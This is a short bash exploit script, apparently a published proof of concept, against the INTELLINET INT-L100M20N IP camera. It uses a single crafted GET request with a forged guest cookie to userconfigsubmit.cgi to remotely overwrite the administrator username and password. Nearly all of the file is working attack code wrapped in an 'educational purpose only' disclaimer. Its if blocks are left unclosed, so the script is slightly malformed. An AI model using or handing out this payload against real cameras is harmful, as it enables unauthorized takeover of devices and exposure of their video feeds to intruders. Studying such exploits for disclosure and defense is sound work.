# INTELLINET IP Camera INT-L100M20N remote change admin user/password
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
# Use them at your own risk!
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " [ INTELLINET IP Camera INT-L100M20N remote change admin user/password"
echo " [ ==="
echo " [ Usage: $0 <target> <user> <password>"
echo " [ Example: $0 admin teflon"
echo " [ ==="
echo " [ Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " [ Website: http://www.ethical-hacker.org/"
echo " [ Facebook: https://www.facebook.com/ethicalhackerorg "
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " [ Error : libwww-perl not found =/"
GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1